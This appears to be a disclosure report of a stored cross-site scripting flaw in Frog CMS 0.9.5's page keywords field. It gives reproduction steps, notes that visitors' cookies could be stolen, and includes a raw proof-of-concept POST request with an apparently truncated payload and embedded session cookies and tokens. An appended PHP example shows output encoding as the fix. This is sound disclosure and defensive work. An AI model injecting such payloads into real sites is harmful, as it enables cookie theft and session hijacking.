Frog CMS simplifies content management by offering an elegant user interface, flexible templating per page, simple user management and permissions, as well as the tools necessary for file management.
GNU General Public License v3.0
Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability #6
I have found a stored Cross Site Scripting Vulnerability.
Log into the system with an administrator role: http://127.0.0.1/test/FrogCMS-master/admin/
Publish an article, and you can click it.
Pages --> Edit Page --> Metadata
payload: "/>
I think you can see the following picture to know more.
Anyone who visits the target page will be affected and trigger the JavaScript code, including administrators, editors, developers, and guests.
If people read our articles, we can easily get their cookie.
payload: "/>
Affected Version:
0.9.5
POC:
POST /test/FrogCMS-master/admin/?/page/edit/3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/FrogCMS-master/admin/?/page/edit/3
Content-Type: application/x-www-form-urlencoded
Content-Length: 675
Cookie: current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e
Connection: keep-alive
Upgrade-Insecure-Requests: 1

page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close
When we published the article, we can see it from the homepage. URL: http://127.0.0.1/test/FrogCMS-master/
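An added example, not part of the original report and not Frog CMS code, showing why a stored keywords value that begins with `"/>` escapes its attribute and how encoding at output time contains it. It assumes the keywords value is written into a double-quoted `content` attribute of a `<meta>` tag; the function names and sample values are constructed for illustration.

```php
<?php
// Added example, not Frog CMS code. Assumption: the stored keywords value is
// written into a double-quoted attribute of a <meta> tag when the page renders.

// Vulnerable pattern: the stored value is concatenated into the attribute as-is.
function render_keywords_unsafe(string $keywords): string
{
    return '<meta name="keywords" content="' . $keywords . '" />';
}

// Hardened pattern: encode for the HTML attribute context at output time.
function render_keywords_safe(string $keywords): string
{
    $encoded = htmlspecialchars($keywords, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<meta name="keywords" content="' . $encoded . '" />';
}

// Round-trip check: parse the markup and confirm the stored value is still
// entirely inside the content attribute and no extra element was created.
function stays_in_attribute(string $html, string $stored): bool
{
    libxml_use_internal_errors(true); // silence parser warnings on odd markup
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><head>' . $html . '</head><body></body></html>');
    libxml_clear_errors();
    $metas = $doc->getElementsByTagName('meta');
    $elements = $doc->getElementsByTagName('*')->length; // html, head, meta, body
    return $metas->length === 1
        && $elements === 4
        && $metas->item(0)->getAttribute('content') === $stored;
}

// Constructed sample values: one benign, one that closes the attribute early
// and is followed by inert marker markup.
$samples = ['frog, cms, pages', '"/><b>constructed-marker</b>'];
foreach ($samples as $stored) {
    printf(
        "%-32s unsafe_contained=%s safe_contained=%s\n",
        $stored,
        var_export(stays_in_attribute(render_keywords_unsafe($stored), $stored), true),
        var_export(stays_in_attribute(render_keywords_safe($stored), $stored), true)
    );
}
```

The same round-trip check can be run in a regression test against every template that prints page metadata, so a field that is later echoed without encoding is caught before release.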